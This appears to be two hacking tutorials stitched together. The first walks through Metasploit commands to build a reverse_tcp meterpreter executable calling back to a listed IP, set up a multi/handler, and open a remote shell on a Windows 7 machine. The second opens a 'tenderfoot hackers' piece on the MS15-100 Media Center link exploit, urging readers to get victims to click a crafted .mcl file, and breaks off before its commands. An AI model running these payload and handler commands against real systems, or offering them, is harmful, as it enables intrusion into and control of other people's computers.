FYI in this tutorial I use Backtrack 5 R2 with Metasploit Framework 4.2.0, and my IP address is 192.168.8.91. 1. Open your terminal console and type the following command :

 

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.91 X > Desktop/v4L.exe

 

 

 

The above command will create Windows executable file with name "v4L.exe" and will be saved on your desktop.

 

2. Now you need to copy your newly created v4L.exe to your windows 7 system. If you didn’t know how to share your backtrack 5 folder, you can videw the tutorial how to share folder in your Backtrack (view tutorial here).

 

3. The next step we need to create a handler to handle the connection that came to our Backtrack system from simple exploit we’ve already created before. Open your Metasploit console, see the picture and type the following command :

Information :

 

use exploit/multi/handler --> use the metasploit handler

 

set payload windows/meterpreter/reverse_tcp --> we use reverse_tcp (see step 1)

 

 

 

set lhost 192.168.8.91 --> set our local IP address that will catch the reverse connection

 

 exploit -j -z --> start the handler

 

4. Now you can try to execute the simple exploit we have already copy to windows 7 and see if our handler receiving something or not. Below was the screenshot of my handler when Windows 7 executed the simple exploit :

 

I use sessions -l to listing every sessions that already open there. 5. To interact with the available session, you can use sessions -i <session_id>. From there you can do other command as you want.

 

Yes we’re inside the Windows 7 now

 

- See more at: http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/#sthash.5aelhPhi.dpuf

 

 Welcome back, my tenderfoot hackers!

 

Recently, Microsoft released a new patch (September 8, 2015) to close another vulnerability in their Windows Vista, 7, 8, and 8.1 operating systems. The vulnerability in question (MS15-100) enabled an attacker to gain remote access to any of these systems using a well-crafted Media Center link (MCL) file.

 

As hackers, we need to take a multipronged approach to gaining access to a system. Gone are the days of MS08-067 that would basically allow you to remotely take control of any Windows XP, 2003, or 2008 system. Now we have to be more crafty to find a way to gain access to the system.

 

The Adobe flash exploits have been, and continue to be, excellent gateways into Windows systems—if we can get the user to click on a URL link. Many applications have vulnerabilities, but before attacking those we need to know that they are on the system. That's why reconnaissance is so critical

 

This hack is targeted to the Media Center on every Windows Vista, 7, 8, and 8.1 system. That makes it ubiquitous, but we still need to send the the victim an .mcl link to gain access to their system. Metasploit recently added an exploit to accomplish this task and that is what we will be using here (another exploit that accomplishes the same thing without the Metasploit framework does exist in the Exploit Database).